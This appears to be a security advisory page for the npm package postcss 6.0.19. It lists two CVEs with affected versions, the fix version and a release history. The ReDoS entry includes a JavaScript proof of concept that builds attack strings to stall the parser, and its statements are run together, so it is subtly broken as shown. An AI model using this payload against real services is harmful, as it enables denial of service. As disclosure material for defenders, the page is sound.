NodeJS/postcss/6.0.19

Tool for transforming styles with JS plugins

https://www.npmjs.com/package/postcss
MIT

2 Security Vulnerabilities

Regular Expression Denial of Service in postcss

Published date: 2022-01-07T00:21:36Z
CVE: CVE-2021-23382
Links:

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern regex \/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

Affected versions: ["0.1.0", "0.2.0", "0.3.0", "0.3.1", "0.3.2", "0.3.3", "0.3.4", "0.3.5", "1.0.0", "2.0.0", "2.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.2.5", "2.2.6", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "4.0.0", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.1.0", "4.1.1", "4.1.2", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.1.8", "4.1.9", "4.1.10", "4.1.11", "4.1.12", "4.1.13", "4.1.14", "4.1.15", "4.1.16", "5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "5.0.5", "5.0.6", "5.0.7", "5.0.8", "5.0.9", "5.0.10", "5.0.11", "5.0.12", "5.0.13", "5.0.14", "5.0.15", "5.0.16", "5.0.17", "5.0.18", "5.0.19", "5.0.20", "5.0.21", "5.1.0", "5.1.1", "5.1.2", "5.2.0", "5.2.1", "5.2.2", "5.2.3", "5.2.4", "5.2.5", "5.2.6", "5.2.7", "5.2.8", "5.2.9", "5.2.10", "5.2.11", "5.2.12", "5.2.13", "5.2.14", "5.2.15", "5.2.16", "5.2.17", "6.0.0", "6.0.1", "6.0.2", "6.0.3", "6.0.4", "6.0.5", "6.0.6", "6.0.7", "6.0.8", "6.0.9", "6.0.10", "6.0.11", "6.0.12", "5.2.18", "6.0.13", "6.0.14", "6.0.15", "6.0.16", "6.0.17", "6.0.18", "6.0.19", "6.0.20", "6.0.21", "6.0.22", "6.0.23", "7.0.0", "7.0.1", "7.0.2", "7.0.3", "7.0.4", "7.0.5", "7.0.6", "7.0.7", "7.0.8", "7.0.9", "7.0.10", "7.0.11", "7.0.12", "7.0.13", "7.0.14", "7.0.15", "7.0.16", "7.0.17", "7.0.18", "7.0.19", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.24", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.31", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "8.0.0", "8.0.1", "8.0.2", "8.0.3", "8.0.4", "8.0.5", "8.0.6", "8.0.7", "8.0.8", "8.0.9", "8.1.0", "8.1.1", "8.1.2", "8.1.3", "8.1.4", "8.1.5", "8.1.6", "8.1.7", "8.1.8", "8.1.9", "8.1.10", "8.1.11", "8.1.12", "8.1.13", "8.1.14", "8.2.0", "8.2.1", "8.2.2", "8.2.3", "8.2.4", "8.2.5", "8.2.6", "8.2.7", "8.2.8", "8.2.9", "8.2.10", "8.2.11", "8.2.12"]
Secure versions: [8.4.31, 8.4.32, 8.4.33, 8.4.34, 8.4.35, 8.4.36, 8.4.37, 8.4.38]
Recommendation: Update to version 8.4.38.

PostCSS line return parsing error

Published date: 2023-09-30T00:31:10Z
CVE: CVE-2023-44270
Links:

An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.

This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.

Affected versions: ["0.1.0", "0.2.0", "0.3.0", "0.3.1", "0.3.2", "0.3.3", "0.3.4", "0.3.5", "1.0.0", "2.0.0", "2.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.2.5", "2.2.6", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "4.0.0", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.1.0", "4.1.1", "4.1.2", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.1.8", "4.1.9", "4.1.10", "4.1.11", "4.1.12", "4.1.13", "4.1.14", "4.1.15", "4.1.16", "5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "5.0.5", "5.0.6", "5.0.7", "5.0.8", "5.0.9", "5.0.10", "5.0.11", "5.0.12", "5.0.13", "5.0.14", "5.0.15", "5.0.16", "5.0.17", "5.0.18", "5.0.19", "5.0.20", "5.0.21", "5.1.0", "5.1.1", "5.1.2", "5.2.0", "5.2.1", "5.2.2", "5.2.3", "5.2.4", "5.2.5", "5.2.6", "5.2.7", "5.2.8", "5.2.9", "5.2.10", "5.2.11", "5.2.12", "5.2.13", "5.2.14", "5.2.15", "5.2.16", "5.2.17", "6.0.0", "6.0.1", "6.0.2", "6.0.3", "6.0.4", "6.0.5", "6.0.6", "6.0.7", "6.0.8", "6.0.9", "6.0.10", "6.0.11", "6.0.12", "5.2.18", "6.0.13", "6.0.14", "6.0.15", "6.0.16", "6.0.17", "6.0.18", "6.0.19", "6.0.20", "6.0.21", "6.0.22", "6.0.23", "7.0.0", "7.0.1", "7.0.2", "7.0.3", "7.0.4", "7.0.5", "7.0.6", "7.0.7", "7.0.8", "7.0.9", "7.0.10", "7.0.11", "7.0.12", "7.0.13", "7.0.14", "7.0.15", "7.0.16", "7.0.17", "7.0.18", "7.0.19", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.24", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.31", "7.0.32", "8.0.0", "8.0.1", "8.0.2", "8.0.3", "7.0.33", "8.0.4", "7.0.34", "8.0.5", "8.0.6", "8.0.7", "8.0.8", "8.0.9", "8.1.0", "7.0.35", "8.1.1", "8.1.2", "8.1.3", "8.1.4", "8.1.5", "8.1.6", "8.1.7", "8.1.8", "8.1.9", "8.1.10", "8.1.11", "8.1.12", "8.1.13", "8.1.14", "8.2.0", "8.2.1", "8.2.2", "8.2.3", "8.2.4", "8.2.5", "8.2.6", "8.2.7", "8.2.8", "8.2.9", "8.2.10", "8.2.11", "8.2.12", "8.2.13", "8.2.14", "8.2.15", "8.3.0", "8.3.1", "7.0.36", "8.3.2", "8.3.3", "8.3.4", "8.3.5", "8.3.6", "8.3.7", "7.0.37", "7.0.38", "8.3.8", "7.0.39", "8.3.9", "8.3.10", "8.3.11", "8.4.0", "8.4.1", "8.4.2", "8.4.3", "8.4.4", "8.4.5", "8.4.6", "8.4.7", "8.4.8", "8.4.9", "8.4.10", "8.4.11", "8.4.12", "8.4.13", "8.4.14", "8.4.15", "8.4.16", "8.4.17", "8.4.18", "8.4.19", "8.4.20", "8.4.21", "8.4.22", "8.4.23", "8.4.24", "8.4.25", "8.4.26", "8.4.27", "8.4.28", "8.4.29", "8.4.30"]
Secure versions: [8.4.31, 8.4.32, 8.4.33, 8.4.34, 8.4.35, 8.4.36, 8.4.37, 8.4.38]
Recommendation: Update to version 8.4.38.

252 Other Versions

Version License Security Released
8.4.38 MIT 2024-03-20 - 22:55 26 days
8.4.37 MIT 2024-03-19 - 16:57 28 days
8.4.36 MIT 2024-03-17 - 20:09 29 days
8.4.35 MIT 2024-02-07 - 15:37 2 months
8.4.34 MIT 2024-02-05 - 19:22 2 months
8.4.33 MIT 2024-01-04 - 19:04 3 months
8.4.32 MIT 2023-12-02 - 02:56 5 months
8.4.31 MIT 2023-09-28 - 22:15 7 months
8.4.30 MIT 1 2023-09-18 - 21:24 7 months
8.4.29 MIT 1 2023-08-29 - 17:47 8 months
8.4.28 MIT 1 2023-08-15 - 19:12 8 months
8.4.27 MIT 1 2023-07-21 - 11:51 9 months
8.4.26 MIT 1 2023-07-13 - 19:24 9 months
8.4.25 MIT 1 2023-07-06 - 11:44 9 months
8.4.24 MIT 1 2023-05-28 - 09:32 11 months
8.4.23 MIT 1 2023-04-19 - 19:03 12 months
8.4.22 MIT 1 2023-04-16 - 13:02 almost 1 year
8.4.21 MIT 1 2023-01-06 - 20:29 over 1 year
8.4.20 MIT 1 2022-12-11 - 17:35 over 1 year
8.4.19 MIT 1 2022-11-10 - 22:57 over 1 year
8.4.18 MIT 1 2022-10-12 - 19:28 over 1 year
8.4.17 MIT 1 2022-09-30 - 11:29 over 1 year
8.4.16 MIT 1 2022-08-06 - 18:59 over 1 year
8.4.15 MIT 1 2022-08-06 - 18:25 over 1 year
8.4.14 MIT 1 2022-05-18 - 16:14 almost 2 years
8.4.13 MIT 1 2022-04-30 - 00:50 almost 2 years
8.4.12 MIT 1 2022-03-16 - 08:38 about 2 years
8.4.11 MIT 1 2022-03-15 - 18:28 about 2 years
8.4.10 MIT 1 2022-03-15 - 18:18 about 2 years
8.4.9 MIT 1 2022-03-15 - 18:08 about 2 years
8.4.8 MIT 1 2022-03-07 - 02:10 about 2 years
8.4.7 MIT 1 2022-02-24 - 22:07 about 2 years
8.4.6 MIT 1 2022-02-01 - 11:37 about 2 years
8.4.5 MIT 1 2021-12-13 - 00:03 over 2 years
8.4.4 MIT 1 2021-11-27 - 14:58 over 2 years
8.4.3 MIT 1 2021-11-26 - 19:20 over 2 years
8.4.2 MIT 1 2021-11-26 - 18:45 over 2 years
8.4.1 MIT 1 2021-11-24 - 22:06 over 2 years
8.4.0 MIT 1 2021-11-24 - 13:06 over 2 years
8.3.11 MIT 1 2021-10-21 - 12:43 over 2 years
8.3.10 MIT 1 2021-10-20 - 17:47 over 2 years
8.3.9 MIT 1 2021-10-04 - 20:14 over 2 years
8.3.8 MIT 1 2021-09-25 - 07:33 over 2 years
8.3.7 MIT 1 2021-09-22 - 05:54 over 2 years
8.3.6 MIT 1 2021-07-21 - 15:53 over 2 years
8.3.5 MIT 1 2021-06-17 - 03:25 almost 3 years
8.3.4 MIT 1 2021-06-14 - 13:27 almost 3 years
8.3.3 MIT 1 2021-06-14 - 05:34 almost 3 years
8.3.2 MIT 1 2021-06-11 - 02:57 almost 3 years
8.3.1 MIT 1 2021-06-09 - 23:38 almost 3 years
8.3.0 MIT 1 2021-05-21 - 03:41 almost 3 years
8.2.15 MIT 1 2021-05-10 - 19:56 almost 3 years
8.2.14 MIT 1 2021-05-05 - 19:44 almost 3 years
8.2.13 MIT 1 2021-04-26 - 12:26 almost 3 years
8.2.12 MIT 2 2021-04-22 - 15:50 almost 3 years
8.2.11 MIT 2 2021-04-22 - 15:32 almost 3 years
8.2.10 MIT 2 2021-04-11 - 16:37 about 3 years
8.2.9 MIT 3 2021-03-30 - 20:43 about 3 years
8.2.8 MIT 3 2021-03-09 - 22:04 about 3 years
8.2.7 MIT 3 2021-03-03 - 23:25 about 3 years
8.2.6 MIT 3 2021-02-10 - 18:38 about 3 years
8.2.5 MIT 3 2021-02-06 - 18:57 about 3 years
8.2.4 MIT 3 2021-01-09 - 10:28 over 3 years
8.2.3 MIT 3 2021-01-07 - 12:06 over 3 years
8.2.2 MIT 3 2020-12-29 - 20:56 over 3 years
8.2.1 MIT 3 2020-12-09 - 11:52 over 3 years
8.2.0 MIT 3 2020-12-08 - 07:16 over 3 years
8.1.14 MIT 3 2020-12-04 - 00:21 over 3 years
8.1.13 MIT 3 2020-12-03 - 03:14 over 3 years
8.1.12 MIT 3 2020-12-03 - 02:41 over 3 years
8.1.11 MIT 3 2020-12-03 - 01:44 over 3 years
8.1.10 MIT 3 2020-11-23 - 22:17 over 3 years
8.1.9 MIT 3 2020-11-21 - 18:37 over 3 years
8.1.8 MIT 3 2020-11-19 - 15:58 over 3 years
8.1.7 MIT 3 2020-11-10 - 15:58 over 3 years
8.1.6 MIT 3 2020-11-05 - 16:28 over 3 years
8.1.5 MIT 3 2020-11-05 - 15:50 over 3 years
8.1.4 MIT 3 2020-10-24 - 00:03 over 3 years
8.1.3 MIT 3 2020-10-23 - 02:20 over 3 years
8.1.2 MIT 3 2020-10-19 - 00:02 over 3 years
8.1.1 MIT 3 2020-09-28 - 21:47 over 3 years
8.1.0 MIT 3 2020-09-26 - 23:35 over 3 years
8.0.9 MIT 3 2020-09-23 - 17:04 over 3 years
8.0.8 MIT 3 2020-09-23 - 02:11 over 3 years
8.0.7 MIT 3 2020-09-22 - 00:55 over 3 years
8.0.6 MIT 3 2020-09-20 - 16:53 over 3 years
8.0.5 MIT 3 2020-09-17 - 02:42 over 3 years
8.0.4 MIT 3 2020-09-16 - 22:20 over 3 years
8.0.3 MIT 3 2020-09-15 - 19:13 over 3 years
8.0.2 MIT 3 2020-09-15 - 16:46 over 3 years
8.0.1 MIT 3 2020-09-15 - 15:34 over 3 years
8.0.0 MIT 3 2020-09-15 - 15:20 over 3 years
7.0.39 MIT 1 2021-10-04 - 20:12 over 2 years
7.0.38 MIT 1 2021-09-25 - 07:30 over 2 years
7.0.37 MIT 1 2021-09-25 - 07:25 over 2 years
7.0.36 MIT 1 2021-06-11 - 02:45 almost 3 years
7.0.35 MIT 3 2020-09-28 - 21:42 over 3 years
7.0.34 MIT 3 2020-09-17 - 01:56 over 3 years
7.0.33 MIT 3 2020-09-16 - 22:12 over 3 years
7.0.32 MIT 3 2020-06-02 - 12:50 almost 4 years